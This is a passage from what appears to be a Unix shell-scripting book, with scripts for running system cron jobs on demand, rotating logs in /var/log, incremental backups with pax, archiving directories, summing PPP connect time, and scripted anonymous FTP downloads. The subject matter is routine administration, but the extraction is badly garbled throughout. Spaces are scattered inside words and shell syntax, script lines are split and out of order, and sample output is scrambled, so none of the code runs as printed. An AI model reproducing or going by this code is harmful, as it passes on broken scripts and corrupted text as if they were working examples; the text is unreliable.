Using a sample cro nt ab file that has two errors and lots of comments, the script produced these results:
$ v eri f ycr on sa mp le.c ront ab
L in e 1 0 : I nv ali d day of w eek v a lue " Mou "
> >> > 1 0 : 0 6 22 * * Mo u /h ome/A C eSy s t em/ b i n/ de l_ o ld _A C in v en to r ie s. p l

L in e 1 2 : I nv ali d minu te v alue " 99"


> >> > 1 2 : 9 9 22 * * 1- 3,6 /home / ACe S y ste m / bi n/ du m p_ cu s t_ p ar t_ n o. pl
D on e. F oun d 2 e rr ors in 1 7 cro n tab e ntr i e s.
The sample c ron ta b file with the two errors, along with all the shell scripts explored in this book, are available at the
official Wicked Cool Shell Scripts website, at ht t p :// w w w.i n tu i ti ve . co m /w ic k ed /

Hacking the Script


Two enhancements would be potentially worth adding to this script. Validating the compatibility of month and day
combinations would ensure that users don't schedule a cro n job to run on, for example, 31 February, which will never
happen. It could also be useful to check that the command being invoked can be found, but that would entail parsing
and processing a PA TH variable (i.e., a list of directories within which to look for commands specified in the script),
which can be set explicitly within a c ront ab file. That could be quite tricky. . . .

#54 Ensuring That System cron Jobs Are Run


Until recently, Unix systems were all designed and developed to run as servers, up 24 hours a day, 7 days a week,
forever. You can see that implicit expectation in the design of the cr on facility: There's no point in scheduling jobs for
2:17am every Thursday if the system is shut down at 6pm for the night.
Yet many modern Unix and Linux users do shut down their systems at the end of the day and start it back up the
following morning. It's quite alien to Mac OS X users, for example, to leave their systems running overnight, let alone
over a weekend or holiday period.
This isn't a big deal with user cront ab entries, because those that don't run due to actual shutdown schedules can
be tweaked to ensure that they do eventually get invoked consistently. The problem arises when the daily, weekly, and
monthly system cro n jobs that are part of the underlying system are not run at the predefined times.
This script enables the administrator to invoke the daily, weekly, or monthly jobs directly from the command line, as
needed.

The Code
# !/ bin / sh
# d ocr o n - R uns t he d aily , wee k ly, a nd m o nt hl y
#
s yst em cro n jo bs on a s y s tem t ha t' s l ik el y
#
t o b e shut dow n dur i ng t h e u s u al t im e o f d ay wh en
#
t he sy stem cro n job s wo u l d o c c ur .
r oo tcr o n=" /e tc/ cr onta b"
i f [ $ # -n e 1 ] ; the n
e cho "Us ag e: $0 [da ily| weekl y |mo n t hly ] " > &2
e xit 1
fi
i f [ " $ (id - u)" - ne 0 ] ; then
# or y o u ca n u se $ ( wh o am i) != " r oo t" he re
e cho "$0 : Com ma nd m ust be ru n as ' roo t ' " >& 2
e xit 1
fi
j ob ="$ ( awk " NR > 6 && /$1 / { f o r ( i = 7;i < = NF ;i ++ ) p ri n t \ $i } " $ ro o tc ro n )"
i f [ - z $j ob ] ; then
e cho "$0 : Err or : no $1 job f o und i n $ r o ot cr on " > &2
e xit 1
fi
S HE LL= / bin /s h

# to be con s i ste n t w it h c ro n' s d e fa ul t

e va l $ j ob

How It Works
Located in either /et c/ dai ly, / etc/ week l y , and / e tc/ m on t hl y or / e tc / cr on . da il y , / e tc /
c ro n.w e ekl y, and / et c/cr on.m onthl y , these c r o n jobs are set up completely differently from user
c ro nta b files: Each is a directory that contains a set of scripts, one per job, that are run by the c r on ta b facility, as
specified in the /e tc /cr on tab file. To make this even more confusing, the format of the /e tc / cr on t ab file is
different too, because it adds an additional field that indicates what effective user ID should run the job.
To start, then, the /et c/ cron tab file specifies the hour of the day (in the second
at which to run the daily, weekly, and monthly jobs:
$ e gre p '( da ily |w eekl y|mo nthly ) ' / e t c/c r o nt ab
# R un d ail y/ wee kl y/mo nthl y job s .
15
3
*
*
*
r o ot
p er io d ic
30
4
*
*
6
r o ot
p er io d ic
30
5
1
*
*
r o ot
p er io d ic

column of the output that follows)

da il y
we ek l y
mo nt h ly

What happens to the daily, weekly, and monthly jobs, though, if this system isn't running at 3:15am every night, at
4:30am on Saturday morning, and at 5:30am on the first of each month?

Rather than trying to force c ro n to run the cr o n jobs, this script locates the jobs and runs them directly with ev al .
The only difference between invoking the jobs from this script and invoking them as part of a cr o n job is that when
jobs are run from cr on , their output stream is automatically turned into an email message, whereas with this script the
output stream is displayed on the screen.

Running the Script


This script must be run as ro ot and has one parameter: either d ai l y, w ee k ly , or m on t hl y, to indicate which
group of system cr on jobs you want to run. To run as ro o t , s ud o is recommended.

The Results
This script has essentially no output and displays no results unless an error is encountered either within the script or
within one of the jobs spawned by the cron scripts.

Hacking the Script


A subtle problem here is that some jobs shouldn't be run more than once a week or once a month, so there should be
some sort of check in place to ensure that that doesn't happen. Furthermore, sometimes the recurring system jobs
might well run from cr on, so we can't make a blanket assumption that if d oc r on hasn't run, the jobs haven't run.
One solution would be to create three empty timestamp files, one each for daily, weekly, and monthly jobs, and then to
add new entries to the /e tc/d aily , /e tc /w e e kly , and /e t c/ m on th l y directories that update the lastmodified date of each timestamp file with t ou ch . This would solve half the problem: do cr o n could then check to see
the last time the recurring c ro n job was run and quit if an insufficient amount of time had passed.
What this solution doesn't avoid is the situation in which, six weeks after the monthly cr o n job last ran, the admin
runs do c ron to invoke the monthly jobs. Then four days later someone forgets to shut off their computer and the
monthly cro n job is invoked. How can that job know that it's not necessary to run the monthly jobs after all?
Two scripts can be added to the appropriate directory. One script must run first from r u n- sc r ip t or p e ri od i c
(the standard ways to invoke cr on jobs) and can then turn off the executable bit on all other scripts in the directory
except its partner script, which turns the execute bit back on after ru n -s cr i pt or p er io d ic has scanned and
ascertained that there's nothing to do: None of the files in the directory appear to be executable, and therefore cr o n
doesn't run them. This is not a great solution, however, because there's no guarantee of script evaluation order, and if
we can't guarantee the order in which the new scripts will be run, the entire solution fails.
There might not be a complete solution to this dilemma, actually. Or it might involve writing a wrapper for r u ns cr ipt or p eri od ic that would know how to manage timestamps to ensure that jobs weren't executed too
frequently.

#55 Rotating Log Files


Users who don't have much experience with Unix can be quite surprised by how many commands, utilities, and
daemons log events to system log files. Even on a computer with lots of disk space, it's important to keep an eye on
the size of these files and, of course, on their contents too.
As a result, most sysadmins have a set of instructions that they place at the top of their log file analysis utilities, similar
to the following:
m v $lo g .2 $l og. 3
m v $lo g .1 $l og. 2
m v $lo g $l og .1
t ou ch $ log
If run weekly, this would produce a rolling one-month archive of log file information divided into week-size portions of
data. However, it's just as easy to create a script that accomplishes this for all log files in the /v ar / lo g directory at
once, thereby relieving any log file analysis scripts of the burden.
The script steps through each file in the /v ar /l o g directory that matches a particular set of criteria, checking each
matching file's rotation schedule and last-modified date to see if it's time for it to be rotated.

The Code
# !/ bin / sh
# r ota t elo gs - Ro lls logf iles i n / v a r/l o g f or a r ch iv a l p ur po s es .
#
U s es a con fi g fi le t o all o w c u s tom i z at io n o f ho w f r eq ue n tl y
#
e a ch lo g s ho uld be r olled . Th e con f i g fi le is i n
#
lo gf ile na me=d urat ion
#
f o rma t, wh er e du rati on is in d a ys. I f, i n t he c o nf i g
#
f i le, a n e nt ry i s mi ssing for a pa r t ic ul ar lo gf i le n am e,
#
r o tat el ogs w on't rot ate t h e f i l e m o r e fr eq u en tl y t h an e v er y s ev en da ys .
l og dir = "/v ar /lo g"
c on fig = "/v ar /lo g/ rota telo gs.co n f"
m v= "/b i n/m v"
d ef aul t _du ra tio n= 7
co unt=0
d ur ati o n=$ de fau lt _dur atio n
i f [ ! -f $c onf ig ] ; the n
e cho "$0 : no co nfig fil e fou n d. C a n't p ro ce ed . " >& 2 ; e xi t 1
fi
i f [ ! -w $l ogd ir -o ! -x $log d ir ] ; t h e n
e cho "$0 : you d on't hav e the app r o pri a t e pe rm i ss io n s i n $l o gd ir " > &2
e xit 1
fi
c d $lo g dir
# W hil e we 'd li ke to use ':dig i t:' w ith t he f in d , ma n y v er si o ns o f
# f ind don 't su pp ort POSI X cha r act e r cl a s s id en t if ie r s, he nc e [ 0- 9 ]
f or na m e i n $(f in d . -typ e f - s ize + 0c ! -n am e ' *[ 0- 9 ]* ' \
! -na me '\ .* ' ! -nam e '*c o nf' - max d e pt h 1 - pr in t | se d ' s/ ^\ . \/ // ' )
do
c oun t =$( ( $co un t + 1 ))
# Gr a b t hi s e nt ry f rom the c o nfi g fil e
d ura t ion =" $(g re p "^ ${na me}=" $co n f ig| c u t -d = - f2 )"
i f [ -z $d ura ti on ] ; t hen
du r ati on =$d ef ault _dur ation
e lif [ " $d ura ti on" = "0 " ] ; the n

fi

ec h o " Du rat io n se t to zero : sk i p pin g $n am e"


co n tin ue

b ack 1 ="$ {n ame }. 1"; back 2="${ n ame } . 2";


b ack 3 ="$ {n ame }. 3"; back 4="${ n ame } . 4";
# If the m ost r ecen tly rolle d lo g fil e (b ac k1 ) h as be e n mo d if ie d w it h in
# th e sp ec ifi c quan tum, then it' s not t im e to ro ta t e i t.
i f [ -f "$ bac k1 " ] ; th en
if [ - z $(f in d \" $bac k1\" - mti m e +$ d u ra ti on -p ri n t 2 >/ de v /n ul l ) ]
th e n
e cho - n " $n ame' s mo st re c ent b ack u p i s mo r e re c en t t ha n $ du r at io n "
e cho " day s: ski ppin g" ;
co n t inu e
fi
fi
e cho "Ro ta tin g log $nam e (us i ng a $du r a ti on d a y sc h ed u le )"
# Ro t ate , sta rt ing with the o lde s t lo g
i f [ -f "$ bac k3 " ] ; th en
ec h o " .. . $ ba ck3 -> $ back4 " ; $ m v - f "$ ba ck 3 " "$ b ac k 4"
fi
i f [ -f "$ bac k2 " ] ; th en
ec h o " .. . $ ba ck2 -> $ back3 " ; $ m v - f "$ ba ck 2 " "$ b ac k 3"
fi
i f [ -f "$ bac k1 " ] ; th en
ec h o " .. . $ ba ck1 -> $ back2 " ; $ m v - f "$ ba ck 1 " "$ b ac k 2"
fi
i f [ -f "$ nam e" ] ; the n
ec h o " .. . $ na me - > $b ack1" ; $ m v -f " $n am e" "$ ba c k1 "
fi
t ouc h "$ na me"
c hmo d 06 00 "$ na me"
d on e
i f [ $ c oun t -eq 0 ] ; the n
e cho "No th ing t o do : no log f ile s big e no ug h o r ol d e n ou gh to r o ta te "
fi
e xi t 0
To truly be useful, the script needs to work with a configuration file that lives in / va r /l og , which allows different log
files to be set to different rotation schedules. The contents of a typical configuration file are as follows:
# C onf i gur at ion f ile for the l o g r o t ati o n s cr ip t .
# F orm a t i s
na me=d urat ion
wh e r e ' n a me ' ca n b e a ny
# f ile n ame t hat a ppea rs i n the /va r / log d ir ec to r y. D u ra t io n
# i s m e asu re d i n days .
f tp .lo g =30
l as tlo g =14
l oo kup d .lo g= 7
l pr .lo g =30
m ai l.l o g=7
n et inf o .lo g= 7
s ec ure . log =7
s ta tis t ics =7
s ys tem . log =1 4
# A nyt h ing w ith a dur atio n of z ero i s n o t r ot at e d
w tm p=0

How It Works
The heart of this script is the fi nd statement:
f or na m e i n $(f in d . -typ e f - s ize + 0c ! -n am e ' *[ 0- 9 ]* ' \
! -na me '\ .* ' ! -nam e '*c o nf' - max d e pt h 1 - pr in t | se d ' s/ ^\ . \/ // ' )
This creates a loop, returning all files in the / v ar/ l o g directory that are greater than 0 characters in size, don't

contain a number in their name, don't start with a period (Mac OS X in particular dumps a lot of oddly named log files
in this directory; they all need to be skipped), and don't end with the word "conf" (we don't want to rotate out the
r ot ate l ogs .c onf file, for obvious reasons!). The ma x d ept h 1 ensures that fi n d doesn't step into
subdirectories. Finally, the se d invocation removes any leading ./ sequences.
Lazy is good!

The rota telo g s script demonstrates a fundamental concept in shell script


programming: the value of avoiding duplicate work. Rather than have each log analysis
script rotate logs, a single log rotation script centralizes the task and makes modifications
easy.

The Results
$ s udo rot at elo gs
f tp .lo g 's mo st re cent bac kup i s mo r e re c e nt t ha n 3 0 d ay s : sk i pp in g
R ot ati n g l og la st log (usi ng a 1 4 d a y sc h e du le )
. .. la s tlo g -> la stlo g.1
l pr .lo g 's mo st re cent bac kup i s mo r e re c e nt t ha n 3 0 d ay s : sk i pp in g
Notice that of all the log files in /var /log , only three matched the specified fi n d criteria, and of those only one,
l as tlo g , hadn't been backed up sufficiently recently, according to the duration values in the configuration file shown
earlier.

Hacking the Script


One example of how this script could be even more useful is to have the oldest archive file, the old $ ba ck 4 file,
emailed to a central storage site before it's over-written by the m v command in the following statement:
e ch o " . .. $b ack 3 -> $ back 4" ; $ mv - f "$ b a ck 3" " $ ba ck 4 "
Another useful enhancement to r otat elogs would be to compress all rotated logs to further save on disk space,
which would also require that the script recognize and work properly with compressed files as it proceeded.

#56 Managing Backups


Managing system backups is a task that all system administrators are familiar with, and it's something that no one
thanks you for doing unless something goes horribly wrong. Even on a single-user personal computer running Linux,
some sort of backup schedule is essential, and it's usually only after you've been burned once, losing a chunk of data
and files, that you realize the value of a regular backup.
One of the reasons so many systems neglect backups is that many of the backup tools are crude and difficult to
understand. The d ump and r estor e commands (called u fsd u mp and r e st o re in Solaris) are typical, with five
"dump levels" and an intimidating configuration file required.
A shell script can solve this problem. This script backs up a specified set of directories, either incrementally (that is,
only those files that have changed since the last backup) or full backup (all files). The backup is compressed on the fly
to minimize space usage, and the script output can be directed to a file, a tape device, a remotely mounted NFS
partition, or even a CD burner on compatible systems.

The Code
# !/ bin / sh
# b ack u p - C rea te s ei ther a fu l l o r inc r e me nt al ba ck u p o f a s et o f
#
d efi ne d d ir ecto ries on t h e s y s tem . By d ef a ul t, th e o ut p ut
#
f ile i s s av ed i n /t mp wi t h a t ime s t am pe d f il en a me , c om p re ss e d.
#
O the rw ise , spec ify an ou t put d evi c e ( an ot h er d i sk , o r a
#
r emo va ble s tora ge d evice ) .
u sa geQ u it( )
{
c at < < " EO F" >& 2
U sa ge: $0 [- o o ut put] [-i |-f] [ -n]
- o l e ts yo u s pe cify an alter n ati v e ba c k up f il e /d ev i ce
- i i s an i ncr em enta l or -f i s a f u ll b a ck up , a nd - n p r ev en t s
u pda t ing t he ti mest amp if an inc r e men t a l ba ck u p is do n e.
E OF
exi t 1
}
c om pre s s=" bz ip2 "
# c h ang e fo r yo u r fa v or i te c o mp re s si on ap p
i nc lis t ="/ tm p/b ac kup. incl ist.$ ( dat e +%d % m %y )"
ou tpu t ="/ tm p/b ac kup. $(da te +% d %m% y ) .bz 2 "
ts fil e ="$ HO ME/ .b acku p.ti mesta m p"
b typ e ="i nc rem en tal"
# d e fau l t t o an in cr e me n ta l b ac ku p
n oin c =0
# a n d a n up da te of t h e t im es t am p
t ra p " / bin /r m - f $inc list " EXI T
w hi le g eto pt s " o: ifn" arg ; do
c ase "$a rg " i n
o ) ou tp ut= "$ OPTA RG";
i ) bt yp e=" in crem enta l";
f ) bt yp e=" fu ll";
n ) no in c=1 ;
? ) us ag eQu it
e sac
d on e

;;
;;
;;
;;
;;

s hi ft $ (($ OP TIN D - 1) )
e ch o " D oin g $bt yp e ba ckup , sav i ng o u tpu t to $ ou t pu t"
t im est a mp= "$ (da te +'% m%d% I%M') "
i f [ " $ bty pe " = " incr emen tal" ] ; t h en
i f [ ! - f $ts fi le ] ; t hen
ec h o " Er ror : can' t do an i n cre m e nta l ba ck up : n o t im e st am p f il e " >& 2

ex i t 1
fi
f ind $HO ME -d ep th
pa x -w - x t ar |
f ail u re= "$ ?"
e ls e
f ind $HO ME -d ep th
pa x -w - x t ar |
f ail u re= "$ ?"
fi

- type f -n e wer $ tsf i l e -u se r $ {U S ER : -L OG N AM E} | \


$ comp ress > $o u t put
- type f -u s er $ { USE R : -L OG NA M E} | \
$ comp ress > $o u t put

i f [ " $ noi nc " = " 0" - a "$ failu r e" = "0" ] ; t he n


t ouc h -t $ tim es tamp $ts file
fi
e xi t 0

How It Works
For a full system backup, the pax command does all the work, piping its output to a compression program (b z ip 2 by
default) and then to an output file or device. An incremental backup is a bit more tricky because the standard version of
t ar doesn't include any sort of modification time test, unlike the GNU version of t a r. The list of files modified since
the previous backup is built with fi nd and saved in the inc l i st temporary file. That file, emulating the t ar output
format for increased portability, is then fed to p a x directly.
Choosing when to mark the timestamp for a backup is an area in which many backup programs get messed up,
typically marking the "last backup time" when the program has finished the backup, rather than when it started. Setting
the timestamp to the time of backup completion can be a problem if any files are modified during the backup process
(which can take quite a while if the backup is being fed to a tape device). Because files modified under this scenario
would have a last-modified date older than the timestamp date, they would not be backed up the next night.
However, timestamping before the backup takes place is wrong too, because if the backup fails, there's no way to
reverse the updated timestamp. Both of these problems are avoided by saving the date and time before the backup
starts (in the ti mes ta mp variable), but applying the value of $ ti me st a mp to $ ts fi l e using the -t flag to
t ou ch only after the backup has succeeded.

Running the Script


This script has a number of options, all of which can be ignored to perform the default incremental backup based on
the timestamp for the last incremental backup. The flags allow you to specify a different output file or device (- o
o ut put ), to choose a full backup (- f), to actively choose an incremental backup (- i), or to prevent the timestamp
file from being updated in the case of an incremental backup (-n).

The Results
$ b ack u p
D oi ng i ncr em ent al bac kup, savi n g o u t put t o /t mp / ba ck u p. 1 40 70 3 .b z2
As you would expect, the output of a backup program isn't very scintillating. But the resulting compressed file is
sufficiently large that it shows plenty of data is within:
$ l s - l /t mp /ba ck up*
- rw -r- - r-1 t ay lor
whe el 6 1 739 0 0 8 J u l 1 4 07 : 31 b a ck u p. 14 0 70 3. b z2

#57 Backing Up Directories


Related to the task of backing up entire file systems is the user-centric task of taking a snapshot of a specific directory
or directory tree. This simple script allows users to easily create a compressed t a r archive of a specified directory.

The Code
# !/ bin / sh
# a rch i ved ir - Cr eate s a compr e sse d arc h i ve o f t he s p ec i fi ed di re c to ry .
m ax arc h ive di r=1 0
# size , in b loc k s , of ' b ig ' d ir e ct or y
c om pre s s=g zi p
# chan g e t o you r fa vo ri t e co m pr e ss a p p
p ro gna m e=$ (b ase na me $ 0)
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $p rogn ame direc t ory " >&2 ; ex it 1
fi
i f [ ! -d $1 ] ; then
e cho "${ pr ogn am e}: can' t fin d di r e cto r y $ 1 to ar ch i ve . " >& 2 ; ex i t 1
fi
i f [ " $ (ba se nam e $1)" != "$1" - o " $ 1 " = " ." ] ; th en
e cho "${ pr ogn am e}: You must s pec i f y a s ub di re c to ry " > & 2
e xit 1
fi
i f [ ! -w . ] ; t hen
e cho "${ pr ogn am e}: cann ot wr i te a r chi v e f il e t o cu r re n t di r ec to r y. " > &2
e xit 1
fi
d ir siz e ="$ (d u - s $1 | awk '{pr i nt $ 1 }') "
i f [ $ d irs iz e - gt $ma xarc hived i r ] ; th e n
e cho -n "W arn in g: d irec tory $ 1 i s $di r s iz e bl o ck s. Pr o ce ed ? [ n] "
r ead ans we r
a nsw e r=" $( ech o $ans wer | tr ' [:u p p er: ] ' ' [: lo w er :] ' | cu t - c1 )"
i f [ "$a ns wer " != " y" ] ; th e n
ec h o " ${ pro gn ame} : ar chive of d i rec t o ry $ 1 c an ce l ed . " >& 2
ex i t 0
fi
fi
a rc hiv e nam e= "$( ec ho $ 1 | sed ' s /$/ . t gz/ ' ) "
i f tar cf - $1 | $com pres s > $ a rch i v ena m e ; t he n
e cho "Di re cto ry $1 arch ived a s $ a r chi v e na me "
e ls e
e cho "Wa rn ing : tar enco unter e d e r r ors a rc hi vi n g $1 "
fi
e xi t 0

How It Works
This script is almost all error-checking code, to ensure that it never causes a loss of data or creates an incorrect
snapshot. In addition to the typical tests to validate the presence and appropriateness of the starting argument, this
script also forces the user to be in the parent directory of the subdirectory to be compressed and archived, which
ensures that the archive file is saved in the proper place upon completion. The conditional i f [ ! - w . ] ;
t he n verifies that the user has write permission on the current directory. And this script even warns users before
archiving if the resultant backup file would be unusually large.
Finally, the actual command that archives the specified directory is

t ar cf - $ 1 | $ co mpre ss > $arc h ive n a me


The return code of this command is tested to ensure that the script never deletes the directory if an error of any sort
occurs.

Running the Script


This script should be invoked with the name of the desired directory to archive as its only argument. To ensure that the
script doesn't try to archive itself, it requires that a subdirectory of the current directory be specified as the argument,
rather than ".".

The Results
$ a rch i ved ir sc ri pts
W ar nin g : d ir ect or y sc ript s is 2 224 b loc k s . Pr oc e ed ? [ n] n
a rc hiv e dir : arc hi ve o f di recto r y s c r ipt s ca nc el e d.
This seemed as though it might be a big archive, so I hesitated to create it, but thinking about it, there's no reason not
to proceed after all:
$ a rch i ved ir sc ri pts
W ar nin g : d ir ect or y sc ript s is 2 224 b loc k s . Pr oc e ed ? [ n] y
D ir ect o ry sc rip ts arc hive d as s cri p t s.t g z
The results:
$ l s - l sc ri pts .t gz
- rw -r- - r-1 t ay lor
Helpful for developers

sta ff

3 2 564 8 Jul 1 4 08 :0 1 s cr i pt s .t gz
When I'm actively working on a project, I use ar c hi ve d ir in a c ro n
job to automatically take a snapshot of my working code each night for
archival purposes.

Chapter 7: Web and Internet Users


Overview
One area where Unix really shines is the Internet. Whether it's running a fast server from under your desk or simply
surfing the Web intelligently and efficiently, there's precious little you can't embed in a shell script when it comes to
Internet interaction.
Internet tools are scriptable, even though you might never have thought of them that way. For example, ft p , a
program that is perpetually trapped in debug mode, can be scripted in some very interesting ways, as is explored in
Script #59. It's not universally true, but shell scripting can improve the performance and output of most command-line
utilities that work with some facet of the Internet.
Perhaps the best tool in the Internet scripter's toolbox is l ynx , a powerful text-only web-browsing tool. Sites don't look
glamorous when you strip out all the graphics, but l y nx has the ability to grab website content and dump it to
standard output, making it a breeze to use gr ep and s e d to extract specific snippets of information from any website,
be it Yahoo!, the Federal Reserve, or even the ESPN.com home page.
Figure 7-1 shows how my own website (http : / /ww w . int u i ti ve .c o m/ ) looks in the spartan l yn x browser:

Figure 7-1: A graphically complex website in l ynx http//www.intuitive.com/


An alternative browser that's, well, synonymous with l ynx is lin k s, offering a similar text-only browsing
environment that has rich possibilities for use in shell scripting. Of the two, ly n x is more stable and more widely
distributed.
If you don't have either browser available, you'll need to download and install one or the other before you proceed with
the scripts in this chapter. You can get lynx from h t t p:/ / l yn x. br o ws er . or g / and li nk s from
h tt p:/ / lin ks .br ow ser. org/ . The scripts in this chapter use ly nx , but if you have a preference for l in ks ,
it is sufficiently similar that you can easily switch the scripts to use it without much effort.
Caution One limitation to the website scraper scripts in this chapter is that if the website that a script depends on
changes its layout, the script can end up broken until you go back and ascertain what's changed with the
site. If any of the website layouts have changed since November 2003, when this chapter was
completed, you'll need to be comfortable reading HTML (even if you don't understand it all) to fix these
scripts. The problem of tracking other sites is exactly why the Extensible Markup Language (XML) was
created: It allows site developers to provide the content of a web page separately from the rules for its
layout.

#58 Calculating Time Spent Online


While every ISP offers relatively expensive unlimited-use dial-up accounts, you might not realize that many ISPs also
have very low-cost monthly dial-up accounts if your usage stays below a certain number of hours of connect time in a
given month. The problem is, how do you calculate your total connection time on a Unix system? Let's have a look. . . .

The Code
# !/ bin / sh
# c onn e ctt im e - R epor ts c umula t ive c onn e c ti on t i me f o r m on th / ye ar en tr i es
#
fou n d i n the s yste m lo g fil e . F o r si m p li ci ty , t hi s i s a n a wk p r og ra m .
l og ="/ v ar/ lo g/s ys tem. log"
t em pfi l e=" /t mp/ $0 .$$"

# t h is i s ju s t / va r/ l og /s y st e m on so me ma ch i ne s

t ra p " r m $ te mpf il e" 0


c at << 'EO F' > $t empf ile
B EG IN {
l ast m ont h= ""; s um = 0
}
{
i f ( $1 != la st mont h && last m ont h != " " ) {
if (su m > 6 0) { t otal = su m /60 " ho u r s" }
el s e
{ t otal = su m " m i nut e s " }
pr i nt la stm on th " : " total
su m =0
}
l ast m ont h= $1
s um + = $ 8
}
E ND {
i f ( s um > 60) { tot al = sum/ 6 0 " h our s " }
e lse
{ tot al = sum " mi n u tes " }
p rin t la st mon th ": " to tal
}
E OF
g re p " C onn ec t t im e" $ log | awk -f $ t emp f i le
e xi t 0

How It Works
On most Unixes, the system log file contains log entries from the PPP (Point-to-Point Protocol) daemon. Here's an
example of a log snippet from a Mac OS X system, looking at /va r /l o g/ sy s te m .l og :
$ g rep ppp d /va r/ log/ syst em.lo g
J ul 12 10: 10 :57 l ocal host pppd [ 169 ] : Co n n ec ti on te rm i na t ed .
J ul 12 10: 10 :57 l ocal host pppd [ 169 ] : Co n n ec t ti m e 2. 1 m i nu te s .
J ul 12 10: 10 :57 l ocal host pppd [ 169 ] : Se n t 1 50 09 by te s , r ec ei v ed 3 8 78 11 by te s .
J ul 12 10: 11 :11 l ocal host pppd [ 169 ] : Se r i al l in k d is c on n ec te d .
J ul 12 10: 11 :12 l ocal host pppd [ 169 ] : Ex i t .
There are a number of interesting statistics in this snippet, most importantly the actual connect time. Slice those
connect time strings out of the log file, add them up, and you've got your cumulative connect time for the month. This
script is smart enough to calculate month-by-month totals even if you don't rotate your logs (though you should; see
Script #55, Rotating Log Files, for details on how to accomplish this quite easily).
This script is essentially just a big a wk program that checks month values in the sy s te m. l og entries to know how
to aggregate connect time. When $ 1, the month field in the log file output, is different from l as t mo nt h , and
l as tmo n th isn't the empty string (which it is when the script begins analyzing the log file), the script outputs the
accumulated time for the previous month and resets the accumulator, su m , to zero:
i f ( $1 != la st mont h && last m ont h != " " ) {

if (su m > 6 0) { t otal = su m /60 " ho u r s" }


el s e
{ t otal = su m " m i nut e s " }
pr i nt la stm on th " : " total
su m =0

The rest of the program should be straightforward reading. Indeed, aw k programs can be quite clear and readable,
which is one reason I like using awk for this type of task.
Handy savings tip

The dial-up account I use with Earthlink has five hours per month prepaid, so this
utility helps ensure that I know when I exceed that and am going to be charged by
the hour for additional connect time. It's quite helpful for minimizing those monthly
dial-up bills!

Running the Script


This script has no arguments, though you might need to tweak it to ensure that it's pointing to the log file on your
particular system that records p pd output messages.

The Results
You can tell I don't rotate my log files on my laptop too often:
$ c onn e ctt im e
A pr : 4 . 065 h our s
J un : 2 6 .71 h our s
J ul : 1 . 963 33 ho ur s
A ug : 1 5 .08 5 hou rs

#59 Downloading Files via FTP


One of the original killer apps of the Internet was file transfer, and the king of file transfer programs is f tp , the File
Transfer Protocol. At some fundamental level, all Internet interaction is based upon file transfer, whether it's a web
browser requesting an HTML document and its accompanying graphic files, a chat server relaying lines of discussion
back and forth, or an email message traveling from one end of the earth to the other.
The original f tp program still lingers on, and while its interface is quite crude, it's powerful, capable, and well worth
taking advantage of with some good scripts. There are plenty of newer f tp programs around, notably nc f tp (see
http://www.ncftp.org/), but with some shell script wrappers, f t p does just fine for uploading and downloading files.
For example, a typical use for ft p is to download files from the Internet. Quite often, the files will be located on
anonymous FTP servers and will have URLs similar to f t p:/ / s om es er v er / pa th / fi le n am e. A perfect use for
a scripted ftp .

The Code
# !/ bin / sh
# f tpg e t - G ive n an f tp-s tyle U RL, u nwr a p s it a n d tr i es to o b ta in th e
#
f i le us ing a nony mous ftp.
a no npa s s=" $L OGN AM E@$( host name) "
i f [ $ # -n e 1 ] ; the n
e cho "Us ag e: $0 ftp ://. .." > & 2
e xit 1
fi
# T ypi c al UR L: ft p:// ftp. ncftp . com / 2 .7. 1 / nc ft pd - 2. 7. 1 .t a r. gz
i f [ " $ (ec ho $1 | cut -c1 -6)" ! = " f t p:/ / " ] ; t h en
e cho "$0 : Mal fo rmed url . I n e ed i t to s ta rt w i th f t p: / /" > & 2;
e xit 1
fi
s er ver = "$( ec ho $1 | c ut - d/ -f 3 )"
f il ena m e=" $( ech o $1 | cut -d/ - f4- ) "
b as efi l e=" $( bas en ame $fil ename ) "
e ch o $ { 0}: D own lo adin g $b asefi l e f r o m s e r ve r $s e rv er
f tp -n << EO F
o pe n $ s erv er
u se r f t p $ an onp as s
g et $f i len am e $ ba sefi le
q ui t
E OF
i f [ $ ? -e q 0 ] ; the n
l s - l $b as efi le
fi
e xi t 0

How It Works
The heart of this script is the sequence of commands fed to the f tp program:
f tp -n << EO F
o pe n $ s erv er
u se r f t p $ an onp as s
g et $f i len am e $ ba sefi le
q ui t
E OF

This script illustrates the essence of a batch file: It prepares a sequence of instructions that it then feeds to a separate
program, in this case ftp . Here we specify the server connection to open, specify the anonymous user (ft p) and
whatever default password is specified in the script configuration (typically your email address), and then get the
specified file from the FTP site and quit the transfer.

Running the Script


In use, this script is simple and straightforward: Just fully specify an f tp URL, and it'll download the specified file to the
current working directory.

The Results
$ f tpg e t f tp :// ft p.nc ftp. com/n c ftp / n cft p - 3. 1. 5- s rc .t a r. b z2
f tp get : Do wn loa di ng n cftp -3.1. 5 -sr c . tar . b z2 f ro m s er v er ft p. n cf tp . co m
- rw -rw - r-1 t aylo r
taylo r
394 7 7 7 Ja n
6 08 : 26 nc ft p -3 .1 . 5- sr c .t ar . bz 2
Some versions of f tp are more verbose than others, and because it's not too uncommon to find a slight mismatch in
the client and server protocol, those verbose versions of ftp can spit out scary-sounding but safely ignored errors, like
Unimplemented command. For example, here's the same script run within Mac OS X:
$ f tpg e t f tp :// ft p.nc ftp. com/n c ftp / n cft p - 3. 1. 5- s rc .t a r. b z2
0 55 -ft p get .s h: Do wnlo adin g ncf t p-3 . 1 .5- s r c. ta r. b z2 f r om se rv e r ft p .n cf t p. co m
C on nec t ed to nc ft p.co m.
2 20 nc f tpd .c om Nc FTPd Ser ver ( l ice n s ed c o py ) re a dy .
3 31 Gu e st lo gin o k, s end your c omp l e te e - ma il a d dr es s a s p as s wo rd .
2 30 -Yo u ar e use r #10 of 1 6 sim u lta n e ous u se rs a l lo we d .
2 30 2 30 Lo g ged i n a no nymo usly .
R em ote sys te m t yp e is UNI X.
U si ng b ina ry mo de to tran sfer f ile s .
l oc al: ncf tp -3. 1. 5-sr c.ta r.bz2 rem o t e: n c ft p/ nc f tp -3 . 1. 5 -s rc . ta r. b z2
5 02 Un i mpl em ent ed com mand .
2 27 En t eri ng Pa ss ive Mode (209 , 197 , 1 02, 3 8 ,2 12 ,2 1 8)
1 50 Da t a c on nec ti on a ccep ted f r om 1 2 .25 3 . 11 2. 10 2 :4 92 3 6; tr an s fe r s ta rt i ng f o r
n cf tp- 3 .1. 5- src .t ar.b z2 ( 39477 7 by t e s).
1 00 % | * *** ** *** ** **** **** ***** * *** * * *** * * ** ** ** * ** ** * |
3 85 KB
2 66 .1 4 K B/ s
0 0: 00 E TA
2 26 Tr a nsf er co mp lete d.
